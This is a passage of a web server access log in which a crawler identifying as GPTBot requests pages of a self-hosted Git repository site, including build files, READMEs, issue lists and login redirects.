"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29898] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:17:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9958] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10120] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10308] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10689] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:13:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/README.md" -[17/Feb/2026:17:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 21843] [Gzip 12.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md?display=rendered" [Client 74.7.227.38] [Length 16006] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 6721] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:17:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14336] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10012] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:14:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:14:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/README.md" -[17/Feb/2026:17:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:17:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9936] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10098] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10284] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:17:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14611] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10676] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:17:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11325] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14310] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9987] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10274] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 16142] [Gzip 10.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:17:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 16109] [Gzip 10.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:17:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:17:14:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:14:20 